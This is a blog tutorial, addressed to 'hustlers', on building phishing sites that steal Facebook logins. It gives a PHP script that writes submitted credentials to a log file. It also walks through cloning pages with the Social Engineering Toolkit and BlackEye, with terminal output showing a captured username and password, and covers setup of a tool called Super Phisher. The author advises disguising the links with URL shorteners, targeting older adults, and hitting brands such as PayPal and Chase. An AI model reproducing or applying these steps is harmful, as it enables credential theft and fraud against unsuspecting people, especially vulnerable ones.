Sunday, August 30, 2020

How to Create a Phishing Website 2020 {PC & Phone Setup}

Howdy, hustler? There is this disturbing hustler in my list requesting for how to create a phishing website. I can’t conceal the secret anymore because a phishing webpage is an essential tool for any online hustle. One of the first stages of becoming a hacker is to learn to phish.

Hiring a web developer to design a phishing website is a BIG mistake to avoid. The reason is that the developer will become aware of your secret. If the web developer is a freaking hustler, he might install viruses that will monitor your phishing activities. In short, it compromises the money you should bill the clients using your phishing website.

Fortunately, you will learn how to create a phishing site with or without programming skills. Yes, there is no mistake in what you just read. You’ll further learn how to create a phishing website with your phone (iOS, HarmonyOS, or Windows) and how to make a phishing site on Android.

What to Consider before you Create a Phishing Website

There are several methods regarding how to create a phishing website for billing. Nevertheless, I welcome the pain to teach you as many methods for creating a phishing website that works. This lesson is also important if you also want to learn to hack a Facebook account
The lessons will mainly cover:
  • how to make a phishing site with 000webhost
  • how to make a phishing webpage in Kali Linux
  • how to create a phishing site using Android
Where necessary, I will indicate how to make a phishing site on Android and other mobile operating systems. Understand that it is not every method for creating a phishing website that you will learn can be possible with a mobile phone. I will advise that you skip methods that require a PC if you have either Android, iOS, Windows, HarmonyOS, etc.

Note: I recommend Android over any other OS.

Platforms for Creating Webpage for Phishing

The two platforms we will use are:
For easy understanding, I will indicate when a method is possible with a phone. If it applies to PC only, I will also indicate for you.
So, how can I create a phishing website that works?
How to Create a Phishing Website

  • Method 1: How to Make a Phishing Site with 000webhost
  • Method 2: How to Make a Phishing Webpage in Kali Linux
  • Method 3: how to create a phishing site using Android
  • Method 4: Create a Phishing Website Using Super Phisher

Method 1: How to Make a Phishing Site with 000webhost

Regarding how to create a phishing website, 000webhost is one of the prestigious methods. This method also regards how to make a phishing site using notepad. It requires a PC for the best experience. Nonetheless, you can use an Android phone, but it must have at least 3 gigabytes of RAM storage.
create a phishing website with webhost000
Webhost Cpanel Login

Identify the Target Website and Download the HTML Index

For this guide, we are creating a phishing website out of www.facebook.com.
For Android
  • Download Naked Browser LTS from Google Play Store
  • Visit facebook.com
  • Swipe your screen to the right.
  • Click View Page Source.
You should now see the source code of facebook.com. Nobody knows that source code is viewable with a mobile phone. So, try to keep my secret a secret.
For PC
  • Install Firefox or Chrome
  • Visit Facebook.com.
  • Right-click and select View Source. In some browsers like Firefox, you will see View Source Element.
Your browser will split-display, and what you find on the right or left side of your screen is the HTML source code of the Facebook webpage. If you are using the Naked Browser LTS for Android, the source code will open in a new tab.

Copy the HTML Source Code

You now have to select and copy the entire text. This method is purely how to make a phishing site using notepad because it requires either the notepad or WordPad application to be successful.
For Android
  • Download FX file manager.
  • Launch the app and Media Card.
  • Click the options button at the top-right screen.
  • Click File.
  • Click Text.
  • Name the file as index.html.
  • Paste the Facebook HTML source code.
You now have to use someone’s PC and convert the index.html file to Unicode using Windows Explorer. Simply click on Save As and set the encoding to Unicode.
For PC
  • Install a Notepad (recommended) or WordPad.
  • Launch the Notepad and paste the HTML source code.
  • Click Save As.
  • Name the file as index.html.
  • Set Save as type as All Files and set Encoding as Unicode.

Create the Password PHP File

This stage is the main deal regarding how to create a phishing page of any website. It is where every Facebook client login password will go for phishing to be successful. Since you have no programming knowledge, copy the code below.
<?php
header (‘Location: facebook.com ‘);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
Now, paste this code in your Notepad (PC user) or create a new .txt file using Android (mobile users). Use post.php as the file name and select Unicode for the encoding format.

Merge the PHP File with the HTML Source Code File

Concerning how to create a phishing web, if we do not integrate the PHP file in the HTML file, phishing won’t work. If you are using an Android phone, download PC Keyboard from
What do we do? Below are the steps to integrate the PHP keyword picker in the HTML.
  • Launch the HTML file with your browser.
  • Click Ctrl F.
  • Input “=action” in the provided space.
  • You should see an underlined part of the codes. Select and replace the portion with “post.php”.
If you are creating a phishing website from a site other than Facebook, the method will not be the same. However, you can access the login of that site by doing the following:
  • Open the website.
  • Click Login.
  • Right-click and view page source. You should find something similar to what we have for Facebook in this article (=action).

Host the PHP File Online with 000webhost

In case you are wondering what the “hosting” means, it is simply the act of making the phishing website available online. Without hosting the PHP file, clients will be unable to access the website, and you will not phish passwords. Do the following to host the files on 000webhost.
  • Visit 000.webhost.com.
  • Sign up for free and confirm your email address.
  • Click Upload Files Now.
  • Select the Public_html folder and click the upload icon in the toolbar.
  • Click Select Files and select the PHP file.
  • Hit Upload, and your files will upload to the servers.
Note: I have tested the free hosting from 000webhost, and it is quite slow with several downtimes.
You have to change the permission to 777 and tick all the boxes in the screen prompt. Finally, close the FTP server and copy down your web address.

Host the Phishing Page

Regarding how to make a fake website for phishing, it is time to host the phishing webpage. Below are the proper steps towards hosting the phishing page as someone without programming skills.
Note: If you uploaded to the root folder of your web host directory, add http:// just in front of the site.

If you are not sure whether you added, you can test by navigating to http://yourwebsiteforyourpostphpupload/post.php. If it redirects to the website you are phishing, you are good to go. In the case of this article, it will redirect us to www.facebook.com. If there are issues, confirm whether you uploaded it to the file to the right directory. If everything is successful, copy and paste the index.html text in www.htmlpasta.com. Complete the Google reCAPTCHA challenge and click Paste. The action will automatically generate a link for the phishing website you are creating.

Test the Website

Visit the phishing website you just created and try to login with any Facebook login detail. When you click login, it should redirect you to www.facebook.com. If there is no redirection, there is a problem. After all, the principle regarding how to create a phishing page step by step is that you remain attentive per step.

If it logs in correctly, navigate to your FTP server, and you should find a Log.txt file. In this guide, the Log.txt file is present where we have the post.php file. Open the Log.txt file and you should find the Facebook login details you attempted in frontend (the user-accessible login page).

 Guess what? Your phishing website is ready with the help of 000webhost! Share the link with targets you want to phish. You can also do Facebook phishing to hack a Facebook account successfully.

Method 2: How to Make a Phishing Webpage in Kali Linux

This method concerns how to make a phishing webpage in Kali Linux. Unfortunately, mobile users will be unable to create a phishing webpage using this method. The reason is that Kali Linux will not run on mobile. Even if there is a way to run the Kali Linux on mobile, the experience will not be good. So, let’s see how to create a phishing webpage combining Kali Linux and the credential harvester.
#Requirements
  • Kali Linux
  • Social Engineering Toolkit (preinstall in Kali Linux)
  • Target phishing website URL.
For this guide regarding how to create a phishing website, we will create a phishing page for www.facebook.com. The process is the same notwithstanding the website you prefer to use for the phishing creation.

Launch the Terminal in Kali

First, open the terminal window in Kali and be sure to have root access. If you are a non-root user, type sudo root and enter your password. From the Application options, click the dropdown and select Kali Linux > Exploitation Tools > Social Engineering Toolkit > Setoolkit.


If you are a root user, simply type setoolkit in the command line. A warning message will appear informing you that this tool is to be used with company authorization or for educational purposes only and that the terms of service will be violated if you use it for malicious purpose. Well, since you will be using it for a malicious purpose, you are already violating the terms of service.
Anyway, type “Y” to agree to the terms and conditions of using the tool. Y stands for yes.

Social Engineering Attack

Still, on how to create a phishing page step by step, it’s time to play around with the Social Engineering Toolkit. Bear in mind that the essence of this method is to capture user logins and the Social Engineering Toolkit is the password harvester. Let’s proceed!
A menu will come up after you insert the “Y” command. Do the following:
  • Input 1.
  • Input 3 to select Credential Harvester Attack Method.
At this point, you are presented with options to either clone a page for phishing or create a malicious phishing page. For this guide on how to create a simple phishing page, we will select the cloning option for facebook.com.
  • Input 2 to select Site Cloner.
Note: You have to be patient because it will take time for the Social Engineering Toolkit to clone Facebook. It might take even longer for weak PCs.

Set IP Address for Password Harvesting

Open a new terminal and type in ifconfig. Look for ‘inet’ and copy the IP address you find there. Social Engineering Toolkit will request for the IP address to store the credentials it will capture. Simply paste the IP address you copied in the recent terminal.

Input Your Phishing Website

Enter the site you want to use for creating a phishing page. Note that we use facebook.com in this step by step guide for creating a phishing website. Social Engineering Toolkit will request for Apache Server to run while phished data is written to Apache root directory. Input “Y” to allow and the phishing setup for facebook.com is complete.


Facebook.com is now hosted, and your phishing page is active. So, you can now share with the targets you want to phish. But then, there is a little problem. Clients become suspicious and will not want to use the IP to login to Facebook. Fortunately, there is a solution; what do you do?
You require a link shortening service to conceal the malicious login link before sending out to phishing targets. Some of the link shortening service providers are:
  • ly
  • ly
  • ClickMeter
  • TinyURL
  • Rebrandly
  • T2M
  • gl
Copy your IP address as http://yourIPaddress and paste in any of the link shortening services. It should look like http://72.229.28.185. Click shorten URL and the IP link will change to a unique URL that will redirect credentials to you.

Share the link as Email, text message, social media message, etc. You can increase your phishing chances by targeting older adults or convincing young users to login via the link. Simply tell them that it is the new mode of accessing Facebook or the phishing site that you use for free.


Finally, locate the login details by clicking Home > Root > Var > WWW. Click on the HTML or .txt file for a list of passwords from people that use the link to access their accounts.

Method 3: How to Create a Phishing Website with Your Phone

This method is a special method from me to you because I’m aware that about 50% of hustlers have no PC. It requires your phone and BlackEye application. The BlackEye app I have supports phishing on 32 websites. Some of the websites include GitHub, Protonmail, Facebook, Shopify, Twitter, PayPal, Google, Gitlab, Adobe, MySpace, Pinterest, Verizon, etc.


Normally, BlackEye is most functional using Kali Linux concerning how to create a phishing page of any website. However, we can install the relevant commands on an Ubuntu or Debian device. Simply update the Kali distro, and you install BlackEye.
Note: We are using facebook.com for this guide to create the phishing page.

Download BlackEye

Before downloading BlackEye, clone the source from the GitHub repository. How do you clone the source correctly?
Open a terminal window and input the command codes below.
~$ git clone https://github.com/thelinuxchoice/blackeye
Cloning into ‘blackeye’…
remote: Enumerating objects: 361, done.
remote: Total 361 (delta 0), reused 0 (delta 0), pack-reused 361
Receiving objects: 100% (361/361), 8.01 MiB | 3.17 MiB/s, done.
Resolving deltas: 100% (101/101), done.
~$ cd blackeye
~/blackeye$
The command above will install and activate the BlackEye repository. Go to the blackeye folder and run the bash blackeye.sh command. Below is what you should see:


~/blackeye$ bash blackeye.sh :: Disclaimer: Developers assume no liability and are not    ::     :: responsible for any misuse or damage caused by BlackEye.  ::     :: Only use for educational purporses!!                      ::      :: Attacking targets without mutual consent is illegal!      :: [01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1[02] Facebook       [18] eBay[03] Snapchat       [19] Pinterest[04] Twitter        [20] CryptoCurrency[05] Github         [21] Verizon[06] Google         [22] DropBox[07] Spotify        [23] Adobe ID[08] Netflix        [24] Shopify[09] PayPal         [25] Messenger[10] Origin         [26] GitLab[11] Steam          [27] Twitch[12] Yahoo          [28] MySpace[13] Linkedin       [29] Badoo[14] Protonmail     [30] VK[15] WordPress      [31] Yandex[16] Microsoft      [32] devianART

Modify Facebook.com Page

how to modify facebook.com page
Right-click and click on the “View Page source”
Facebook.com will show an expired copyright notice. If you do not like that, return to the blackeye folder from the bash script and type Is. Typing Is will display the sites folder in the BlackEye repository.


~/blackeye$ ls blackeye.sh  LICENSE  README.md  sites
With the cd sites command, you can still navigate to the sites folder and then reveal the sites by entering Is command. You can then choose the template site to modify for the phishing. For this guide, facebook.com is our interest.


~/blackeye$ cd sites~/blackeye/sites$ ls adobe   cryptocurrency  facebook  google          linkedin   myspace  paypal      shopify   spotify  twitter  wordpressbadoo   devianart       github    instafollowers  messenger  netflix  pinterest   shopping  steam    verizon  yahoocreate  dropbox         gitlab    instagram       microsoft  origin   protonmail  snapchat  twitch   vk       yandex
For you to edit Facebook, retype Is to access the files. It will be similar to the source code below:


~/blackeye/sites$ cd facebook~/blackeye/sites/facebook$ ls index_files  index.php  ip.php  ip.txt  login.html  login.php  saved.ip.txt  saved.usernames.txt
Now, edit the HTML source code of facebook.com using any text editor from the app store. Simply open login.html, and you should find the source code for the Facebook login page.

Build the Facebook.com Phishing Page

Do the following:
  • Open a new terminal window.
  • Navigate to the blackeye folder.
  • Run bash blackeye.sh.
  • Return to the selection menu of the phishing page where you have a list of phishing websites.
  • As you can see in the source code below, Facebook is number 2, so you have to select 02 and press enter.
~/blackeye/sites/protonmail$ cd~$ cd blackeye~/blackeye$ bash blackeye.sh [01] Instagram      [17] IGFollowers   [33] Custom     BLACKEYE  v1.1[02] Facebook       [18] eBay[03] Snapchat       [19] Pinterest[04] Twitter        [20] CryptoCurrency[05] Github         [21] Verizon[06] Google         [22] DropBox[07] Spotify        [23] Adobe ID[08] Netflix        [24] Shopify[09] PayPal         [25] Messenger[10] Origin         [26] GitLab[11] Steam          [27] Twitch[12] Yahoo          [28] MySpace[13] Linkedin       [29] Badoo[14] Protonmail     [30] VK[15] WordPress      [31] Yandex[16] Microsoft      [32] devianART [*] Choose an option: 18

After selecting Facebook as a phishing website, the terminal will request an IP address. Input your IP address, press enter, and you will see something similar to what we have below.
[*] Put your local IP (Default 10.0.6.27): [*] Starting php server…[*] Send this link to the Victim: 72.229.28.185[*] Waiting victim open the link …
You can now navigate to facebook.com for the result of your phishing setup.

Capture the Password on Facebook

Now, you can share the link to targets and convince them to use the link.
[*] Waiting victim open the link … [*] IP Found![*] Victim IP: 72.229.28.185[*] User-Agent:  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0[*] Saved: shopping/saved.ip.txt
The moment your target uses the link to login to facebook.com, BlackEye reports the username, as you can see below.
[*] Waiting credentials … [*] Credentials Found![*] Account: smartlazyhustler[*] Password:  thesmartlazyhustler1997[*] Saved: sites/shopping/saved.usernames.txt
The only downside with this method is that it will not work if the target uses 2FA security on his/her account.

Method 4: Create a Phishing Website Using Super Phisher

Super Phisher is a simple tool that phishers do not use very often. It is a straightforward tool to use, and I’ll quickly highlight things to do to create a unique phishing site.
#Requirements
Note: We are using facebook.com for the sake of this phishing website guide.

Download and Extract Super Phisher

I can’t include the download link here for obvious reasons. After downloading the Super Phisher, extract the files and launch Super Phisher.

Complete the Super Phisher Form

Enter https://www.facebook.com in the URL of Login Page section.
For Name of Log File, you can input any name (name.txt) that you will remember (it is where the logins will be saved).
Use the PHP file name for the Name of PHP File section.
Enter https://www.facebook.com in Site to Redirect To.
Click Build Phisher. Clicking the Build Phisher will generate two output files in the output folder.

Create a Webhosting Account

You need to host the files with web hosts that support FTP. I recommend hosting services like t35.com and byethost.com. You can also search for free host services if you don’t want to spend it. Also, note that free hosting makes your phishing website slow and unstable.
Note: If you do not know how to create a web hosting account, you can send me a request email for a hosting account.

Host the Phishing Files

Go to Super Phisher and upload the two files you find there to your webhost. Make sure to upload both files to public_html.
From there, you can look for your phishing page URL. If you can’t find the URL, copy the source code in HTML file and paste in www.htmlpasta.com. Complete the reCAPTCHA challenge, and you will see your URL.
Share the phishing link with people you want to phish. Once they use the link to login to Facebook, their login details will be saved to your web account. Navigate to Log.txt file in your hosting account and retrieve the Facebook login details.

Top 10 Websites to Use for Phishing

  • Netflix
  • Chase
  • Yahoo
  • Facebook
  • PayPal
  • Apple
  • Microsoft
  • Amazon
  • eBay
  • WhatsApp
NOTE
I do not include download links in my articles for obvious reasons.

Conclusion

So, here is all regarding how to create a phishing page step by step. The exciting thing is that I have painstakingly explained this guide for those without any programming skills. I bet you can’t find any better guide out there unless you wish to spend your data.


If you find it difficult to follow up, then hire a web developer to do the job. But like I mentioned earlier, it is unsafe to hire a developer for your phishing website. Lest I forget, you can also create a phishing e-commerce website to phish credit card details. However, that’s a story for another day.
Phish Safely…
Don't read for just yourself, share with your friends - because you love them. Please!!!
Join other Hustlers in LearningDon't Miss Out
Previous Post
Next Post

post written by:

0 Comments: